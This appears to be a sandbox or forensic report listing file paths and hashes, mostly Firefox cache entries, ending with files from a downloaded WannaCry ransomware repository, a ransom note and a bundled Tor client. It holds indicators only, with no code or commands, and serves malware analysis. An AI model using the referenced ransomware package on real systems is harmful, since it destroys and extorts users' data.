SHA512 36832c75df5381c305811cd6eb225b6130e0dd186bf0608524625b5c91f63e76137759849d942cbbee3b5ea833f1e253f7a37955ed05d6cc284579d7f4043d03

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\75E10B6CA912F3DD72B094B84BA83E8A0158EE6A

MD5 8a4491b905a2a8a39630a18c84c8b869
SHA1 7b44885637d04c994a7959999a8783ca543a43bb
SHA256 2ea195d7b8d4d80230376ab6d357058ce949672f239c51de8e994734a75fe1c1
SHA512 6ebbc1ae691963f065de760be70668c0db8780317d7783a8eff1993fcb1d4c41920f080be5004b9220aed85c9dbbd5b3337d601c6f349f34dfc880a8360bd742

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\CF082F6E5E460A360E0559F4CA94ED1B2773AD56

MD5 bb3668bf221d5485bf35af1a439a2be6
SHA1 b04ff271a4d2b6de245ef58f023a32138aca5616
SHA256 4032dea9543d88b535437d6f02b9fee71682df7005fa9db505dbcf88b415e15c
SHA512 c2c6d2ce3d382e8d543c49bbeed11c4f98da01405e0d2737f2d7c804ad6faa870d445f35a37aec287e0a11abddeb781d0a98682367b3579f80ca70a97462461a

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\A7185B128F37007861637E9F7A1F3A17CC67A193

MD5 4f282b842a87d16a5c29c18a64d8b372
SHA1 93646485f86a85c92fe7107c24b7e0fd7a847f6a
SHA256 62f06e61e56763d722b1c8b05e271590d0d54e263bfd273d4cebe4a51eb61d56
SHA512 cf45014089d361758d025ba36bfda9d0d6a0a66e3412b53f1271868515f9a2c96eb1d0c0830622a21c66c1ad30b4a48a42d20f4ee3493e2d4c7d90c9f2e8f5f8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\B8342474273D37A8A890CF968C26F05C940C66F0

MD5 835a0ad1c02d689549b79883d885dbe0
SHA1 bcf8e45c6140a8ad8cef7864355f04e1105a97b8
SHA256 e8e03eb828568e8c27157e41ff10b455402fb12555da810907a2274c73728b89
SHA512 fa3c447188957ab3f2d5cb76c445d2a7f0f475b944f0be8dfe59e242984ebe5c2d179e350c952fb76f25a765e2b4435e0deb9a84c2540f8ce639d38292e5a1b9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\349EC0746A7A7C40F924DB3CF0957ABB04298440

MD5 c2545cc144e78087eaee218a0663654f
SHA1 870e4c842cc5034bdd2a602de3313417e10a32f2
SHA256 72f9e47941d68fe2be4316ed10f23baae8a4c3fa5ee55c6413f0b5c5de518e98
SHA512 330d89c0c82d8005a24869572404f88aec22f0578a7c7f81b774dfcdc8f5198f9b7a9ba2184e618d1d5ad8f87a56b39d9455c6414d1f4279f868aa0ead8a68d6

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\D0AF9688BF547CD0A8E3B588F816B3FD56561337

MD5 3cd94ab3321d2b5baee005a53562f2aa
SHA1 77f5b40f6357b29b5d610e29cd9c668028a76d90
SHA256 01613602f79467e2fef8c2156e904ed82f2cbac415347a59d193a542061c893a
SHA512 cd1984d40d4612b40cea0e02a7716d46c1f01c8caae6ae775c2294d14f09ba41a3758d15bd1fa4bab03c12b5c44bdcc1cc60b12bc9120e27f23f2ef40a535973

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\AA760A3DBDC90071E7345327E1D0D2D023C9E436

MD5 6bf3fdf80f4b07a2f254973c6006e6af
SHA1 5d2c13edf34c7d33e23da952060d4745bcb0d8cf
SHA256 27a31e0398d085db5cc0b6eade850359cb16b32ed2b93bef6f8233a1c7a91553
SHA512 3d2466080488a55f0452a210ffbcc4892fd8b6f427286be43b05f9153d18b4715305306c02fe0b4fbc59668b2c4507c39009e201f1972a11c1d7ade8816f132c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\9F73202CCBC4D299254FA58CA5A84115CD3120AA

MD5 19236d5eeefcc17e9933d3cab4e12b78
SHA1 bb7eb56dabfbcd1f0168ed0ba52116fc8947f3fd
SHA256 1f72215c71e559ea9a9c39f87cf8762b6854083137da53a5f184feff33eaedb5
SHA512 f100e31ffb3719a1ac61e2dd696b49b417ddb1a6f265a8eebbfdccc87a2b44f756f1c1f980b176cfc55cee89a56451054048a85dc01c79826215bcc4958145e2

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\9A7F8872B335617C85443C8249C30C8F3D8C08B3

MD5 4b534c0c95f69e04f44c8ec0f1c7caf5
SHA1 d78546b68e65a8bf502008092f2e26fb5bf89a65
SHA256 89acee5f99aa26c1b9b5a9e9d96ad66ae63fef7ddb7545657d76781ca02015b8
SHA512 1c4054032efb197923d7ba9f6d7980fc64922edd07b973fe2cce4ca45f66c8ac6c8d360c1501508db3828640d6181fe109920bcaa9af8e5134f7142d2b56c1a7

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\0A7E7594E69C439CD52608F096A141AF3C4BD6DD

MD5 9dc4c2d8c8450a1a3d92662fc6e33cb2
SHA1 4ac2db90468cd70ac0b2d050880414f80d411928
SHA256 d337e32d5d22072bfe38ad7cccb5b9b6dda88fd81e582f1a29563d834eb2eca9
SHA512 94d039f1b63a43ddceefd350c6cc907f2b05148fc899fe2ff236a1ecc1fa99818afb3f9904e2053c8352603d19bac74ccfbf23a396d45e6488061ed8f45200b1

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\8C329D8569CB535EB8A8DFE21B8A7DF316190487

MD5 dfc6aec9a3db7ebd7590a35d608cebe8
SHA1 89e848c4048fdf6a27c7c679de2a3d0fcb69ecd5
SHA256 08c6f8e8ff80b09d6e9dc73d17449e199dadacef0c7972b8a974b9a12217f092
SHA512 c4d38f76f061004d96cd2911c05771c746ddaa35ea498dbdcc3d62a5b4bb436171d5a34b14b70faf458e37efb5d5994af8c3619fe8b72f9192cd70faae7ae8f4

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\619495392A1160857D64FE2ADBFB41504AE56622

MD5 131361766c50d2bfda32d4867eed5957
SHA1 486fc943fcde9dc9971b0b14d97cd66b1ce79eea
SHA256 60f74f6a3960c2ffce46d7115323c6411cf9a1dfc65270c753014230070fe0ca
SHA512 47d3238eb27e5def5ae912e3691c42de22950363dce5ed291b0848857fbc4af12b8deed74a30c4005585b3c081c3e1ac819a08c69e74b2fd7adb89a1286e4010

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\32EBD18D648D0C2686A8CEA2660881510BCE9AFB

MD5 f8aa04400c195e4686c800f28d89f716
SHA1 afe0b12094e50077a6767dd86c4405fdfba8e219
SHA256 ed18805022b6a508d97f0bb4c82f55361e4872cd887051df0efbe9b6bf88dede
SHA512 27699c1e913be3e087c073d6e71aa08d685e789ba336d119c4b708a057926192383dcafb005045523b1d6de2f7b30432657cfbc140f8895c8f15b85afd8e8af9

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\81EC6C1C952C9B69019B0101287C103BB1192909

MD5 478aced0f9949ccb75601e4256fdf08f
SHA1 94742ea5cad93a9e117c84a942009fde3226ee5b
SHA256 a5f1dc0d03b9a6d0ce764c422b62894d712560ec8aa33dc8c6772c707b21d1d5
SHA512 fc51e0f4568a692164b521d2c82b74d17b569324d521a14ecc53185291988cb5be739266f455328636837410a8be3ba47047d5b8b9c6779f67a705f99267c3a8

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\2CFCC364A7B2E7A8E9AB96BD93785B6E9759AA7A

MD5 5f2f72dc28bad6bff0c3482fdb34d853
SHA1 fb045e011b5815bebc4690837f0edac6d824b6fd
SHA256 56e629b18620ce7ddc8bd761244e930b45e99f3d47b1f2f69848daccf62013c8
SHA512 3f5d3f4b469c5a311bf35d58a80d8f392b78edd670f318a807cefc77d3355043a28c1df29fcbde7b21c1ee2f03d4386635f96fedf597c6e8d2328ef2937e9042

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\1BD049D77EA7AE92A7679A43976B47361EFA250A

MD5 a3f8f3fbb9d61587580cfeb7e3e8239b
SHA1 2f22ea4cdd1ef6447d369dfc2fc617c6e81b3db9
SHA256 7fbbd11a28683297199486e7d9061ae7243fe0b6e303080063ba71d99984dae3
SHA512 f41312d8875f2bffc8749f93475b9b8c6ab5f9a9871020dedf6e791a57105105cee3b4b569e475d829d061afcfa3721b8141da388e4855abecee75490e23581c

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\59E775949006F35F294214D82A34914D2424484A

MD5 0641fe6c5415f8c3b354721f11cd0c7f
SHA1 e0d3b7d6d29d3271a526dab94a2407e8f4032b9a
SHA256 eb6382ba468e6b77edcec9668790c0df662aedb4337e608f8ae56bb2969a810e
SHA512 d9bb71f203f0cffed2a47e68cc1d47b913ca11b31230e485e2bb7c8a4f5ec43b736062c8c334fc21368059c15eb269ca35ddbd017f4db191d951740eea19bb6f

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\BE91A47AE98719A666A0AE5DBC6C5CAFCB6513CF

MD5 2dea996d476ead4c4d4271e3651b9dcc
SHA1 2c27ba7aa543a07ef391789358b745a848118b71
SHA256 2d38012fd4fea03c6023ab858a13cce561a666e329c6706b53abea7828a20c17
SHA512 6b69846f60060fb8cec8c41d8f472808376425299475a4a5b470fd14da622ee8e47668c0f180c9e5c77653c1e9a29ee6f3139831a2edded9573b7d9c3ad34662

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\1DF431202663B96214352B1DFE36A726B4137A2F

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\D7EB97B69BE4CE4C6BB9083B4E08A4B504BFC2E3

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\73C7F1E668813518B669C33D69033779C04F9F54

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\71BF779DFBCE1307F42244F92E6190F178BC7120

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\cache2\entries\6586F7B38489859730F9ADC10B28BFE43E7639AA

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\storage\default\https+++www.google.com\.metadata-v2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore-backups\recovery.jsonlz4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs-1.js

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionCheckpoints.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\sessionstore.jsonlz4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\xulstore.json.tmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\places.sqlite

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\msg\m_finnish.wnry

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\@[email protected]

C:\Users\Default\Desktop\@[email protected]

C:\Users\Admin\Downloads\RANSOMWARE-WANNACRY-2.0-master\RANSOMWARE-WANNACRY-2.0-master\Ransomware.WannaCry\TaskData\Tor\tor.exe

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
